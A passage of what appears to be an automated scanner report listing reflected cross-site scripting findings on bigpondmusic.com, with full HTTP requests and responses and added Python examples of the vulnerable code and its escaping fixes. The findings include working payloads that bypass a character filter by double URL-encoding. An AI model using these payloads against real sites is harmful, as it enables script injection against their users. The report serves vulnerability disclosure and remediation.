Content-Length: 87881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'articlec1573';b4178195f66';
   s.prop5 = '5081';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.373. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c725e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40e60e54ffc was submitted in the REST URL parameter 2. This input was echoed as c725e"><script>alert(1)</script>40e60e54ffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /news/articlec725e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40e60e54ffc/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88306


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/articlec725e"><script>alert(1)</script>40e60e54ffc/5081/lykke-li-gets-ready-for-wounded-rhymes" />
...[SNIP]...

2.374. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ccd235c3f was submitted in the REST URL parameter 4. This input was echoed as 64d5f"><script>alert(1)</script>57ccd235c3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes64d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ccd235c3f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 168289


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Lykke Li gets ready for Woun
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes64d5f"><script>alert(1)</script>57ccd235c3f" />
...[SNIP]...

2.375. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2c29c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252772376223bf was submitted in the REST URL parameter 4. This input was echoed as 2c29c'style='x:expression(alert(1))'72376223bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying injection into the attribute is browser-independent.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes2c29c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252772376223bf HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 168062


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Lykke Li gets ready for Woun
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes2c29c'style='x:expression(alert(1))'72376223bf' />
...[SNIP]...

2.376. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc03d"style%3d"x%3aexpression(alert(1))"869a944c8ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc03d"style="x:expression(alert(1))"869a944c8ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying injection into the attribute is browser-independent.

Request

GET /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes?cc03d"style%3d"x%3aexpression(alert(1))"869a944c8ad=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 168029


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Lykke Li gets ready for Woun
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes?cc03d"style="x:expression(alert(1))"869a944c8ad=1" />
...[SNIP]...

2.377. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d27c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17f3fae913f was submitted in the REST URL parameter 1. This input was echoed as 5d27c"><script>alert(1)</script>17f3fae913f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /news5d27c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17f3fae913f/article/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news5d27c"><script>alert(1)</script>17f3fae913f/article/5082/guy-sebastian-re-inks-deal-with-sony-music" />
...[SNIP]...

2.378. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4939'%3b74b0a8d079c was submitted in the REST URL parameter 1. This input was echoed as a4939';74b0a8d079c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be encoded for a JavaScript string literal at the point of output (quotes, backslashes, line terminators and the < and > characters escaped as \xHH or \uHHHH sequences); HTML-encoding alone does not protect a script context.

Request

GET /newsa4939'%3b74b0a8d079c/article/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'newsa4939';74b0a8d079c';
   s.prop4 = 'article';
   s.prop5 = '5082';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...
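Worked example for finding 2.378 (added here; this is not code from the original report or from bigpondmusic.com). It rebuilds the tracking snippet seen in the response above, shows why the reported payload ends the single-quoted string literal, and applies the escaping that keeps a reflected value inside the literal. The function names are hypothetical; the payload is the one reported, as the application sees it after the web server has URL-decoded %3b once.

```python
"""Reflection into a single-quoted JavaScript string (finding 2.378)."""
from typing import Tuple

# Constructed sample: the reported payload after one URL-decode by the server.
PAYLOAD = "a4939';74b0a8d079c"


def render_channel_vulnerable(channel: str) -> str:
    """Mirror of the behaviour in the response: raw concatenation."""
    return "s.channel = '" + channel + "';"


def js_string_escape(value: str) -> str:
    """Escape a value for a JavaScript string literal (either quote style).

    Everything outside a small ASCII allow list is hex-escaped, so quotes,
    backslashes, '<', '/' and line terminators can neither close the literal
    nor the enclosing <script> element."""
    out = []
    for ch in value:
        if ch.isascii() and (ch.isalnum() or ch in " ,.-_"):
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def render_channel_safe(channel: str) -> str:
    """Same snippet, with the value escaped for the JS string context."""
    return "s.channel = '" + js_string_escape(channel) + "';"


_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b",
                   "f": "\f", "v": "\v", "0": "\0"}


def split_single_quoted_literal(js: str) -> Tuple[str, str]:
    """Parse the first single-quoted string literal in `js`.

    Returns (decoded value, text after the closing quote). This is the check
    to run on a reflected snippet: a healthy reflection leaves just ';' after
    the quote; anything else is attacker-controlled code."""
    i = js.index("'") + 1
    value = []
    while i < len(js):
        ch = js[i]
        if ch == "\\":
            nxt = js[i + 1]
            if nxt == "x":
                value.append(chr(int(js[i + 2:i + 4], 16)))
                i += 4
            elif nxt == "u":
                value.append(chr(int(js[i + 2:i + 6], 16)))
                i += 6
            else:
                value.append(_SIMPLE_ESCAPES.get(nxt, nxt))
                i += 2
            continue
        if ch == "'":
            return "".join(value), js[i + 1:]
        value.append(ch)
        i += 1
    raise ValueError("unterminated string literal")


if __name__ == "__main__":
    for render in (render_channel_vulnerable, render_channel_safe):
        line = render(PAYLOAD)
        value, rest = split_single_quoted_literal(line)
        print(f"{line}\n  literal={value!r} trailing={rest!r}")
```

For the vulnerable rendering the parser stops at the injected quote and reports `;74b0a8d079c';` as trailing code, which is exactly what the scanner means by "terminate the JavaScript string". Hex-escaping the value rather than backslash-escaping the quote is deliberate: it also neutralises `</script>` inside the literal, which a quote-only escape would not.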

2.379. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cbfc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60376ad53ee was submitted in the REST URL parameter 2. This input was echoed as 5cbfc"><script>alert(1)</script>60376ad53ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article5cbfc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60376ad53ee/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88700


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article5cbfc"><script>alert(1)</script>60376ad53ee/5082/guy-sebastian-re-inks-deal-with-sony-music" />
...[SNIP]...
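Worked example for finding 2.379 (added here; not code from the original report or from the site). It models the pipeline the report infers, a single URL-decode by the web server, a character filter, then a second decode in the application, and contrasts it with the two fixes the remediation text calls for: validate after the last decode, or better, decode once and encode for the attribute context on output. The blocklist, handler names and the "400 Bad Request" string are assumptions made for the illustration; the request path is the one reported.

```python
"""Double URL-decoding and the order of validation (finding 2.379)."""
import html
from urllib.parse import unquote

# Constructed samples: the reported request path, and its once-decoded form.
DOUBLE_ENCODED = ("/news/article5cbfc%2522%253e%253cscript%253ealert%25281%2529"
                  "%253c%252fscript%253e60376ad53ee")
SINGLE_ENCODED = unquote(DOUBLE_ENCODED)   # what the web server hands over

# Hypothetical filter standing in for the one the report says blocks
# "certain characters that are often used in XSS attacks".
BLOCKED_CHARS = set('<>"\'')
BLOCKED_RESPONSE = "400 Bad Request"       # assumed rejection response


def contains_blocked(value: str) -> bool:
    return any(ch in BLOCKED_CHARS for ch in value)


def render_parent_url(path: str) -> str:
    """The hidden field seen in the response, built by raw concatenation."""
    return ('<input type="hidden" name="parentUrl" '
            'value="http://bigpondmusic.com' + path + '" />')


def handle_vulnerable(raw_path: str) -> str:
    """Decode, validate, decode again: the filter only ever sees %22 and %3c."""
    path = unquote(raw_path)      # the web server's decode, per the report
    if contains_blocked(path):
        return BLOCKED_RESPONSE
    path = unquote(path)          # the application's own, second decode
    return render_parent_url(path)


def handle_validate_after_decode(raw_path: str) -> str:
    """Same double decode, but validation runs on the canonical value."""
    path = unquote(unquote(raw_path))
    if contains_blocked(path):
        return BLOCKED_RESPONSE
    return render_parent_url(path)


def handle_fixed(raw_path: str) -> str:
    """Decode exactly once and HTML-encode for the attribute on output.

    With contextual output encoding the blocklist is no longer load-bearing,
    so this handler does not carry one."""
    path = unquote(raw_path)
    return ('<input type="hidden" name="parentUrl" '
            'value="http://bigpondmusic.com' + html.escape(path, quote=True) + '" />')


if __name__ == "__main__":
    for handler in (handle_vulnerable, handle_validate_after_decode, handle_fixed):
        print(handler.__name__, "->", handler(DOUBLE_ENCODED))
```

Running it shows the vulnerable handler emitting `"><script>alert(1)</script>` inside the `parentUrl` attribute, the validate-after-decode handler rejecting the same request, and the fixed handler reflecting the once-decoded value with its percent sequences intact and any literal quote or angle bracket entity-encoded.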

2.380. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28c6f'%3b9647d275d9d was submitted in the REST URL parameter 2. This input was echoed as 28c6f';9647d275d9d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/article28c6f'%3b9647d275d9d/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88037


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'article28c6f';9647d275d9d';
   s.prop5 = '5082';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.381. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aec1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6787036f4 was submitted in the REST URL parameter 4. This input was echoed as 3aec1"><script>alert(1)</script>df6787036f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music3aec1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6787036f4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
